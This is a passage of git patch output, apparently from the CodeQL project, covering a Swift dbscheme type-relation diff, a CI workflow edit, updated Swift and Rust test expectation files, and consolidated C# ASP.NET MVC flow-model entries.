@type_or_none ref +); + +l_value_types( //dir=type + unique int id: @l_value_type, + int object_type: @type_or_none ref +); + +module_types( //dir=type + unique int id: @module_type, + int module: @module_decl_or_none ref +); + +pack_element_types( //dir=type + unique int id: @pack_element_type, + int pack_type: @type_or_none ref +); + +pack_expansion_types( //dir=type + unique int id: @pack_expansion_type, + int pattern_type: @type_or_none ref, + int count_type: @type_or_none ref +); + +pack_types( //dir=type + unique int id: @pack_type +); + +#keyset[id, index] +pack_type_elements( //dir=type + int id: @pack_type ref, + int index: int ref, + int element: @type_or_none ref +); + +parameterized_protocol_types( //dir=type + unique int id: @parameterized_protocol_type, + int base: @protocol_type_or_none ref +); + +#keyset[id, index] +parameterized_protocol_type_args( //dir=type + int id: @parameterized_protocol_type ref, + int index: int ref, + int arg: @type_or_none ref +); + +protocol_composition_types( //dir=type + unique int id: @protocol_composition_type +); + +#keyset[id, index] +protocol_composition_type_members( //dir=type + int id: @protocol_composition_type ref, + int index: int ref, + int member: @type_or_none ref +); + +@reference_storage_type = + @unmanaged_storage_type +| @unowned_storage_type +| @weak_storage_type +; + +#keyset[id] +reference_storage_types( //dir=type + int id: @reference_storage_type ref, + int referent_type: @type_or_none ref +); + +@substitutable_type = + @archetype_type +| @generic_type_param_type +; + +@sugar_type = + @paren_type +| @syntax_sugar_type +| @type_alias_type +; + +tuple_types( //dir=type + unique int id: @tuple_type +); + +#keyset[id, index] +tuple_type_types( //dir=type + int id: @tuple_type ref, + int index: int ref, + int type_: @type_or_none ref +); + +#keyset[id, index] +tuple_type_names( //dir=type + int id: @tuple_type ref, + int index: int ref, + string name: string ref +); + +unresolved_types( //dir=type + unique int id: @unresolved_type +); + +@any_builtin_integer_type = + @builtin_integer_literal_type +| @builtin_integer_type +; + +@archetype_type = + @local_archetype_type +| @opaque_type_archetype_type +| @pack_archetype_type +| @primary_archetype_type +; + +#keyset[id] +archetype_types( //dir=type + int id: @archetype_type ref, + int interface_type: @type_or_none ref +); + +#keyset[id] +archetype_type_superclasses( //dir=type + int id: @archetype_type ref, + int superclass: @type_or_none ref +); + +#keyset[id, index] +archetype_type_protocols( //dir=type + int id: @archetype_type ref, + int index: int ref, + int protocol: @protocol_decl_or_none ref +); + +builtin_bridge_object_types( //dir=type + unique int id: @builtin_bridge_object_type +); + +builtin_default_actor_storage_types( //dir=type + unique int id: @builtin_default_actor_storage_type +); + +builtin_executor_types( //dir=type + unique int id: @builtin_executor_type +); + +builtin_float_types( //dir=type + unique int id: @builtin_float_type +); + +builtin_job_types( //dir=type + unique int id: @builtin_job_type +); + +builtin_native_object_types( //dir=type + unique int id: @builtin_native_object_type +); + +builtin_raw_pointer_types( //dir=type + unique int id: @builtin_raw_pointer_type +); + +builtin_raw_unsafe_continuation_types( //dir=type + unique int id: @builtin_raw_unsafe_continuation_type +); + +builtin_unsafe_value_buffer_types( //dir=type + unique int id: @builtin_unsafe_value_buffer_type +); + +builtin_vector_types( //dir=type + unique int id: @builtin_vector_type +); + +existential_metatype_types( //dir=type + unique int id: @existential_metatype_type +); + +function_types( //dir=type + unique int id: @function_type +); + +generic_function_types( //dir=type + unique int id: @generic_function_type +); + +#keyset[id, index] +generic_function_type_generic_params( //dir=type + int id: @generic_function_type ref, + int index: int ref, + int generic_param: @generic_type_param_type_or_none ref +); + +generic_type_param_types( //dir=type + unique int id: @generic_type_param_type +); + +metatype_types( //dir=type + unique int id: @metatype_type +); + +@nominal_or_bound_generic_nominal_type = + @bound_generic_type +| @nominal_type +; + +paren_types( //dir=type + unique int id: @paren_type, + int type_: @type_or_none ref +); + +@syntax_sugar_type = + @dictionary_type +| @unary_syntax_sugar_type +; + +type_alias_types( //dir=type + unique int id: @type_alias_type, + int decl: @type_alias_decl_or_none ref +); + +unbound_generic_types( //dir=type + unique int id: @unbound_generic_type +); + +unmanaged_storage_types( //dir=type + unique int id: @unmanaged_storage_type +); + +unowned_storage_types( //dir=type + unique int id: @unowned_storage_type +); + +weak_storage_types( //dir=type + unique int id: @weak_storage_type +); + +@bound_generic_type = + @bound_generic_class_type +| @bound_generic_enum_type +| @bound_generic_struct_type +; + +#keyset[id, index] +bound_generic_type_arg_types( //dir=type + int id: @bound_generic_type ref, + int index: int ref, + int arg_type: @type_or_none ref +); + +builtin_integer_literal_types( //dir=type + unique int id: @builtin_integer_literal_type +); + +builtin_integer_types( //dir=type + unique int id: @builtin_integer_type +); + +#keyset[id] +builtin_integer_type_widths( //dir=type + int id: @builtin_integer_type ref, + int width: int ref +); + +dictionary_types( //dir=type + unique int id: @dictionary_type, + int key_type: @type_or_none ref, + int value_type: @type_or_none ref +); + +@local_archetype_type = + @element_archetype_type +| @opened_archetype_type +; + +@nominal_type = + @class_type +| @enum_type +| @protocol_type +| @struct_type +; + +opaque_type_archetype_types( //dir=type + unique int id: @opaque_type_archetype_type, + int declaration: @opaque_type_decl_or_none ref +); + +pack_archetype_types( //dir=type + unique int id: @pack_archetype_type +); + +primary_archetype_types( //dir=type + unique int id: @primary_archetype_type +); + +@unary_syntax_sugar_type = + @array_slice_type +| @optional_type +| @variadic_sequence_type +; + +#keyset[id] +unary_syntax_sugar_types( //dir=type + int id: @unary_syntax_sugar_type ref, + int base_type: @type_or_none ref +); + +array_slice_types( //dir=type + unique int id: @array_slice_type +); + +bound_generic_class_types( //dir=type + unique int id: @bound_generic_class_type +); + +bound_generic_enum_types( //dir=type + unique int id: @bound_generic_enum_type +); + +bound_generic_struct_types( //dir=type + unique int id: @bound_generic_struct_type +); + +class_types( //dir=type + unique int id: @class_type +); + +element_archetype_types( //dir=type + unique int id: @element_archetype_type +); + +enum_types( //dir=type + unique int id: @enum_type +); + +opened_archetype_types( //dir=type + unique int id: @opened_archetype_type +); + +optional_types( //dir=type + unique int id: @optional_type +); + +protocol_types( //dir=type + unique int id: @protocol_type +); + +struct_types( //dir=type + unique int id: @struct_type +); + +variadic_sequence_types( //dir=type + unique int id: @variadic_sequence_type +); + +@accessor_or_none = + @accessor +| @unspecified_element +; + +@argument_or_none = + @argument +| @unspecified_element +; + +@associated_type_decl_or_none = + @associated_type_decl +| @unspecified_element +; + +@ast_node_or_none = + @ast_node +| @unspecified_element +; + +@availability_info_or_none = + @availability_info +| @unspecified_element +; + +@availability_spec_or_none = + @availability_spec +| @unspecified_element +; + +@brace_stmt_or_none = + @brace_stmt +| @unspecified_element +; + +@captured_decl_or_none = + @captured_decl +| @unspecified_element +; + +@case_label_item_or_none = + @case_label_item +| @unspecified_element +; + +@case_stmt_or_none = + @case_stmt +| @unspecified_element +; + +@closure_expr_or_none = + @closure_expr +| @unspecified_element +; + +@condition_element_or_none = + @condition_element +| @unspecified_element +; + +@decl_or_none = + @decl +| @unspecified_element +; + +@enum_element_decl_or_none = + @enum_element_decl +| @unspecified_element +; + +@expr_or_none = + @expr +| @unspecified_element +; + +@file_or_none = + @file +| @unspecified_element +; + +@function_or_none = + @function +| @unspecified_element +; + +@generic_type_decl_or_none = + @generic_type_decl +| @unspecified_element +; + +@generic_type_param_decl_or_none = + @generic_type_param_decl +| @unspecified_element +; + +@generic_type_param_type_or_none = + @generic_type_param_type +| @unspecified_element +; + +@initializer_or_none = + @initializer +| @unspecified_element +; + +@key_path_component_or_none = + @key_path_component +| @unspecified_element +; + +@location_or_none = + @location +| @unspecified_element +; + +@macro_role_or_none = + @macro_role +| @unspecified_element +; + +@module_decl_or_none = + @module_decl +| @unspecified_element +; + +@nominal_type_decl_or_none = + @nominal_type_decl +| @unspecified_element +; + +@opaque_type_decl_or_none = + @opaque_type_decl +| @unspecified_element +; + +@opaque_value_expr_or_none = + @opaque_value_expr +| @unspecified_element +; + +@param_decl_or_none = + @param_decl +| @unspecified_element +; + +@pattern_or_none = + @pattern +| @unspecified_element +; + +@pattern_binding_decl_or_none = + @pattern_binding_decl +| @unspecified_element +; + +@precedence_group_decl_or_none = + @precedence_group_decl +| @unspecified_element +; + +@protocol_decl_or_none = + @protocol_decl +| @unspecified_element +; + +@protocol_type_or_none = + @protocol_type +| @unspecified_element +; + +@stmt_or_none = + @stmt +| @unspecified_element +; + +@stmt_condition_or_none = + @stmt_condition +| @unspecified_element +; + +@string_literal_expr_or_none = + @string_literal_expr +| @unspecified_element +; + +@tap_expr_or_none = + @tap_expr +| @unspecified_element +; + +@type_or_none = + @type +| @unspecified_element +; + +@type_alias_decl_or_none = + @type_alias_decl +| @unspecified_element +; + +@type_expr_or_none = + @type_expr +| @unspecified_element +; + +@type_repr_or_none = + @type_repr +| @unspecified_element +; + +@value_decl_or_none = + @unspecified_element +| @value_decl +; + +@var_decl_or_none = + @unspecified_element +| @var_decl +; diff --git a/swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/upgrade.properties b/swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/upgrade.properties new file mode 100644 index 00000000000..38e20de39fc --- /dev/null +++ b/swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/upgrade.properties @@ -0,0 +1,2 @@ +description: Add variables to `ForEachStmt` +compatibility: backwards From bed638793c9128faff49b0bbd8b75a870ea58240 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 6 Dec 2024 12:36:19 +0100 Subject: [PATCH 0862/1267] Swift: remove linux QL tests check --- .github/workflows/swift.yml | 7 ------- 1 file changed, 7 deletions(-) diff --git a/.github/workflows/swift.yml b/.github/workflows/swift.yml index 1a1498e948a..d40376149f7 100644 --- a/.github/workflows/swift.yml +++ b/.github/workflows/swift.yml @@ -54,13 +54,6 @@ jobs: steps: - uses: actions/checkout@v4 - uses: ./swift/actions/build-and-test - qltests-linux: - if: github.repository_owner == 'github' - needs: build-and-test-linux - runs-on: ubuntu-22.04 - steps: - - uses: actions/checkout@v4 - - uses: ./swift/actions/run-ql-tests qltests-macos: if: ${{ github.repository_owner == 'github' && github.event_name == 'pull_request' }} needs: build-and-test-macos From f81f30cc4dc41116f76c235aa3838a2c86e0ba1c Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 6 Dec 2024 12:47:54 +0100 Subject: [PATCH 0863/1267] Swift: accept test changes --- .../ParameterizedProtocolType.expected | 16 +++++++ .../ParameterizedProtocolType_getArg.expected | 16 +++++++ .../test/library-tests/ast/PrintAst.expected | 43 ++++++++++--------- 3 files changed, 54 insertions(+), 21 deletions(-) diff --git a/swift/ql/test/extractor-tests/generated/type/ParameterizedProtocolType/ParameterizedProtocolType.expected b/swift/ql/test/extractor-tests/generated/type/ParameterizedProtocolType/ParameterizedProtocolType.expected index 85c426e9c28..309665f809f 100644 --- a/swift/ql/test/extractor-tests/generated/type/ParameterizedProtocolType/ParameterizedProtocolType.expected +++ b/swift/ql/test/extractor-tests/generated/type/ParameterizedProtocolType/ParameterizedProtocolType.expected @@ -1 +1,17 @@ | P | getName: | P | getCanonicalType: | P | getBase: | P | getNumberOfArgs: | 2 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | diff --git a/swift/ql/test/extractor-tests/generated/type/ParameterizedProtocolType/ParameterizedProtocolType_getArg.expected b/swift/ql/test/extractor-tests/generated/type/ParameterizedProtocolType/ParameterizedProtocolType_getArg.expected index 95799228658..2762281ade2 100644 --- a/swift/ql/test/extractor-tests/generated/type/ParameterizedProtocolType/ParameterizedProtocolType_getArg.expected +++ b/swift/ql/test/extractor-tests/generated/type/ParameterizedProtocolType/ParameterizedProtocolType_getArg.expected @@ -1,2 +1,18 @@ | P | 0 | Int | | P | 1 | String | +| RawRepresentable | 0 | Bool | +| RawRepresentable | 0 | Double | +| RawRepresentable | 0 | Float | +| RawRepresentable | 0 | Int8 | +| RawRepresentable | 0 | Int16 | +| RawRepresentable | 0 | Int32 | +| RawRepresentable | 0 | Int64 | +| RawRepresentable | 0 | Int128 | +| RawRepresentable | 0 | Int | +| RawRepresentable | 0 | String | +| RawRepresentable | 0 | UInt8 | +| RawRepresentable | 0 | UInt16 | +| RawRepresentable | 0 | UInt32 | +| RawRepresentable | 0 | UInt64 | +| RawRepresentable | 0 | UInt128 | +| RawRepresentable | 0 | UInt | diff --git a/swift/ql/test/library-tests/ast/PrintAst.expected b/swift/ql/test/library-tests/ast/PrintAst.expected index 82d866baec9..07713e4c28d 100644 --- a/swift/ql/test/library-tests/ast/PrintAst.expected +++ b/swift/ql/test/library-tests/ast/PrintAst.expected @@ -702,6 +702,8 @@ cfg.swift: # 155| getVariable(1): [ConcreteVarDecl] xOptional # 155| Type = Int? # 138| getElement(0): [ForEachStmt] for ... in ... { ... } +# 138| getVariable(0): [ConcreteVarDecl] $generator +# 138| Type = IndexingIterator> # 138| getPattern(): [AnyPattern] _ #-----| getIteratorVar(): [PatternBindingDecl] var ... = ... # 138| getInit(0): [CallExpr] call to makeIterator() @@ -844,8 +846,6 @@ cfg.swift: # 158| getElse(): [BraceStmt] { ... } # 159| getElement(0): [ReturnStmt] return ... # 159| getResult(): [BooleanLiteralExpr] false -# 138| [ConcreteVarDecl] $generator -# 138| Type = IndexingIterator> # 141| [ConcreteVarDecl] $match # 141| Type = Int # 141| [ConcreteVarDecl] $match @@ -3259,6 +3259,10 @@ cfg.swift: # 525| getExpr(): [ExplicitClosureExpr] { ... } # 525| getBody(): [BraceStmt] { ... } # 526| getElement(0): [ForEachStmt] for ... in ... { ... } +# 526| getVariable(0): [ConcreteVarDecl] i +# 526| Type = Int +# 526| getVariable(1): [ConcreteVarDecl] $i$generator +# 526| Type = IndexingIterator> # 526| getPattern(): [NamedPattern] i #-----| getIteratorVar(): [PatternBindingDecl] var ... = ... # 526| getInit(0): [CallExpr] call to makeIterator() @@ -3294,6 +3298,10 @@ cfg.swift: # 525| getExpr().getFullyConverted(): [FunctionConversionExpr] (@isolated(any) () async -> ()) ... # 523| getPattern(0): [NamedPattern] stream # 533| getElement(1): [ForEachStmt] for ... in ... { ... } +# 533| getVariable(0): [ConcreteVarDecl] i +# 533| Type = Int +# 533| getVariable(1): [ConcreteVarDecl] $i$generator +# 533| Type = AsyncStream.Iterator # 533| getPattern(): [NamedPattern] i #-----| getIteratorVar(): [PatternBindingDecl] var ... = ... # 533| getInit(0): [CallExpr] call to makeAsyncIterator() @@ -3302,11 +3310,12 @@ cfg.swift: # 533| getBase().getFullyConverted(): [LoadExpr] (AsyncStream) ... #-----| getMethodRef(): [DeclRefExpr] makeAsyncIterator() # 533| getPattern(0): [NamedPattern] $i$generator -# 533| getNextCall(): [CallExpr] call to next() -# 533| getFunction(): [MethodLookupExpr] .next() +# 533| getNextCall(): [CallExpr] call to next(isolation:) +# 533| getFunction(): [MethodLookupExpr] .next(isolation:) # 533| getBase(): [DeclRefExpr] $i$generator # 533| getBase().getFullyConverted(): [InOutExpr] &... -#-----| getMethodRef(): [DeclRefExpr] next() +#-----| getMethodRef(): [DeclRefExpr] next(isolation:) +# 533| getArgument(0): (no string representation) # 533| getNextCall().getFullyConverted(): [AwaitExpr] await ... # 533| getBody(): [BraceStmt] { ... } # 534| getElement(0): [CallExpr] call to print(_:separator:terminator:) @@ -3321,14 +3330,6 @@ cfg.swift: # 534| getArgument(2): [Argument] terminator: default terminator # 534| getExpr(): [DefaultArgumentExpr] default terminator # 525| [NilLiteralExpr] nil -# 526| [ConcreteVarDecl] i -# 526| Type = Int -# 526| [ConcreteVarDecl] $i$generator -# 526| Type = IndexingIterator> -# 533| [ConcreteVarDecl] i -# 533| Type = Int -# 533| [ConcreteVarDecl] $i$generator -# 533| Type = AsyncStream.Iterator # 538| [NamedFunction] testNilCoalescing(x:) # 538| InterfaceType = (Int?) -> Int # 538| getParam(0): [ParamDecl] x @@ -6936,6 +6937,10 @@ statements.swift: # 9| getVariable(0): [ConcreteVarDecl] i # 9| Type = Int # 2| getElement(0): [ForEachStmt] for ... in ... { ... } +# 2| getVariable(0): [ConcreteVarDecl] i +# 2| Type = Int +# 2| getVariable(1): [ConcreteVarDecl] $i$generator +# 2| Type = IndexingIterator> # 2| getPattern(): [NamedPattern] i #-----| getIteratorVar(): [PatternBindingDecl] var ... = ... # 2| getInit(0): [CallExpr] call to makeIterator() @@ -7097,10 +7102,6 @@ statements.swift: # 30| getExpr(): [DefaultArgumentExpr] default separator # 30| getArgument(2): [Argument] terminator: default terminator # 30| getExpr(): [DefaultArgumentExpr] default terminator -# 2| [ConcreteVarDecl] i -# 2| Type = Int -# 2| [ConcreteVarDecl] $i$generator -# 2| Type = IndexingIterator> # 34| [EnumDecl] AnError # 35| getMember(0): [EnumCaseDecl] case ... # 35| getMember(1): [EnumElementDecl] failed @@ -7371,6 +7372,10 @@ statements.swift: # 71| [TopLevelCodeDecl] { ... } # 71| getBody(): [BraceStmt] { ... } # 71| getElement(0): [ForEachStmt] for ... in ... where ... { ... } +# 71| getVariable(0): [ConcreteVarDecl] number +# 71| Type = Int +# 71| getVariable(1): [ConcreteVarDecl] $number$generator +# 71| Type = IndexingIterator<[Int]> # 71| getPattern(): [NamedPattern] number # 71| getWhere(): [BinaryExpr] ... .==(_:_:) ... # 71| getFunction(): [MethodLookupExpr] .==(_:_:) @@ -7401,10 +7406,6 @@ statements.swift: # 71| getBase().getFullyConverted(): [InOutExpr] &... #-----| getMethodRef(): [DeclRefExpr] next() # 71| getBody(): [BraceStmt] { ... } -# 71| [ConcreteVarDecl] number -# 71| Type = Int -# 71| [ConcreteVarDecl] $number$generator -# 71| Type = IndexingIterator<[Int]> # 74| [StructDecl] HasModifyAccessorDecl # 75| getMember(0): [PatternBindingDecl] var ... = ... # 75| getPattern(0): [TypedPattern] ... as ... From 0d616ca7efde349758bee3e5de042eda82dc5e78 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Fri, 6 Dec 2024 12:23:35 +0000 Subject: [PATCH 0864/1267] C#: Respond to PR comments. --- csharp/ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml | 10 ++-------- 1 file changed, 2 insertions(+), 8 deletions(-) diff --git a/csharp/ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml b/csharp/ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml index e980e51810b..4942fd4bc91 100644 --- a/csharp/ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml +++ b/csharp/ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml @@ -3,11 +3,5 @@ extensions: pack: codeql/csharp-all extensible: summaryModel data: - - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "()", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] - - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.Object)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] - - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.String)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] - - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.String,System.Object)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "taint", "manual"] - - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "()", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] - - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.Object)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] - - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.String)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] - - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.String,System.Object)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] + - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] + - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] From e52e1b0c1fe053bc096cd65fab956fea07181ce8 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 6 Dec 2024 12:24:11 +0000 Subject: [PATCH 0865/1267] Rust: Add test case for 'self' in unused entities. --- .../unusedentities/UnusedValue.expected | 14 +++---- .../unusedentities/UnusedVariable.expected | 41 ++++++++++--------- .../test/query-tests/unusedentities/main.rs | 4 ++ 3 files changed, 32 insertions(+), 27 deletions(-) diff --git a/rust/ql/test/query-tests/unusedentities/UnusedValue.expected b/rust/ql/test/query-tests/unusedentities/UnusedValue.expected index f8538e5b8bc..d5b38540764 100644 --- a/rust/ql/test/query-tests/unusedentities/UnusedValue.expected +++ b/rust/ql/test/query-tests/unusedentities/UnusedValue.expected @@ -8,13 +8,13 @@ | main.rs:65:5:65:5 | f | Variable $@ is assigned a value that is never used. | main.rs:34:13:34:13 | f | f | | main.rs:67:5:67:5 | f | Variable $@ is assigned a value that is never used. | main.rs:34:13:34:13 | f | f | | main.rs:69:5:69:5 | g | Variable $@ is assigned a value that is never used. | main.rs:35:9:35:9 | g | g | -| main.rs:91:9:91:9 | a | Variable $@ is assigned a value that is never used. | main.rs:91:9:91:9 | a | a | -| main.rs:112:9:112:10 | is | Variable $@ is assigned a value that is never used. | main.rs:112:9:112:10 | is | is | -| main.rs:135:13:135:17 | total | Variable $@ is assigned a value that is never used. | main.rs:135:13:135:17 | total | total | -| main.rs:280:13:280:17 | total | Variable $@ is assigned a value that is never used. | main.rs:248:13:248:17 | total | total | -| main.rs:373:9:373:9 | x | Variable $@ is assigned a value that is never used. | main.rs:373:9:373:9 | x | x | -| main.rs:381:17:381:17 | x | Variable $@ is assigned a value that is never used. | main.rs:381:17:381:17 | x | x | -| main.rs:482:9:482:9 | c | Variable $@ is assigned a value that is never used. | main.rs:482:9:482:9 | c | c | +| main.rs:95:9:95:9 | a | Variable $@ is assigned a value that is never used. | main.rs:95:9:95:9 | a | a | +| main.rs:116:9:116:10 | is | Variable $@ is assigned a value that is never used. | main.rs:116:9:116:10 | is | is | +| main.rs:139:13:139:17 | total | Variable $@ is assigned a value that is never used. | main.rs:139:13:139:17 | total | total | +| main.rs:284:13:284:17 | total | Variable $@ is assigned a value that is never used. | main.rs:252:13:252:17 | total | total | +| main.rs:377:9:377:9 | x | Variable $@ is assigned a value that is never used. | main.rs:377:9:377:9 | x | x | +| main.rs:385:17:385:17 | x | Variable $@ is assigned a value that is never used. | main.rs:385:17:385:17 | x | x | +| main.rs:486:9:486:9 | c | Variable $@ is assigned a value that is never used. | main.rs:486:9:486:9 | c | c | | more.rs:44:9:44:14 | a_ptr4 | Variable $@ is assigned a value that is never used. | more.rs:44:9:44:14 | a_ptr4 | a_ptr4 | | more.rs:59:9:59:13 | d_ptr | Variable $@ is assigned a value that is never used. | more.rs:59:9:59:13 | d_ptr | d_ptr | | more.rs:65:9:65:17 | f_ptr | Variable $@ is assigned a value that is never used. | more.rs:65:13:65:17 | f_ptr | f_ptr | diff --git a/rust/ql/test/query-tests/unusedentities/UnusedVariable.expected b/rust/ql/test/query-tests/unusedentities/UnusedVariable.expected index dcfde3c46f5..302810e08e5 100644 --- a/rust/ql/test/query-tests/unusedentities/UnusedVariable.expected +++ b/rust/ql/test/query-tests/unusedentities/UnusedVariable.expected @@ -1,22 +1,23 @@ | main.rs:29:9:29:9 | a | Variable 'a' is not used. | -| main.rs:94:13:94:13 | d | Variable 'd' is not used. | -| main.rs:143:5:143:5 | y | Variable 'y' is not used. | -| main.rs:170:9:170:9 | x | Variable 'x' is not used. | -| main.rs:250:17:250:17 | a | Variable 'a' is not used. | -| main.rs:258:20:258:22 | val | Variable 'val' is not used. | -| main.rs:272:14:272:16 | val | Variable 'val' is not used. | -| main.rs:287:22:287:24 | val | Variable 'val' is not used. | -| main.rs:294:24:294:26 | val | Variable 'val' is not used. | -| main.rs:302:13:302:15 | num | Variable 'num' is not used. | -| main.rs:317:12:317:12 | j | Variable 'j' is not used. | -| main.rs:337:25:337:25 | y | Variable 'y' is not used. | -| main.rs:340:28:340:28 | a | Variable 'a' is not used. | -| main.rs:343:9:343:9 | p | Variable 'p' is not used. | -| main.rs:361:9:361:13 | right | Variable 'right' is not used. | -| main.rs:367:9:367:14 | right2 | Variable 'right2' is not used. | -| main.rs:374:13:374:13 | y | Variable 'y' is not used. | -| main.rs:382:21:382:21 | y | Variable 'y' is not used. | -| main.rs:427:26:427:28 | val | Variable 'val' is not used. | -| main.rs:430:21:430:23 | acc | Variable 'acc' is not used. | -| main.rs:451:9:451:14 | unused | Variable 'unused' is not used. | +| main.rs:89:19:89:22 | self | Variable 'self' is not used. | +| main.rs:98:13:98:13 | d | Variable 'd' is not used. | +| main.rs:147:5:147:5 | y | Variable 'y' is not used. | +| main.rs:174:9:174:9 | x | Variable 'x' is not used. | +| main.rs:254:17:254:17 | a | Variable 'a' is not used. | +| main.rs:262:20:262:22 | val | Variable 'val' is not used. | +| main.rs:276:14:276:16 | val | Variable 'val' is not used. | +| main.rs:291:22:291:24 | val | Variable 'val' is not used. | +| main.rs:298:24:298:26 | val | Variable 'val' is not used. | +| main.rs:306:13:306:15 | num | Variable 'num' is not used. | +| main.rs:321:12:321:12 | j | Variable 'j' is not used. | +| main.rs:341:25:341:25 | y | Variable 'y' is not used. | +| main.rs:344:28:344:28 | a | Variable 'a' is not used. | +| main.rs:347:9:347:9 | p | Variable 'p' is not used. | +| main.rs:365:9:365:13 | right | Variable 'right' is not used. | +| main.rs:371:9:371:14 | right2 | Variable 'right2' is not used. | +| main.rs:378:13:378:13 | y | Variable 'y' is not used. | +| main.rs:386:21:386:21 | y | Variable 'y' is not used. | +| main.rs:431:26:431:28 | val | Variable 'val' is not used. | +| main.rs:434:21:434:23 | acc | Variable 'acc' is not used. | +| main.rs:455:9:455:14 | unused | Variable 'unused' is not used. | | more.rs:24:9:24:11 | val | Variable 'val' is not used. | diff --git 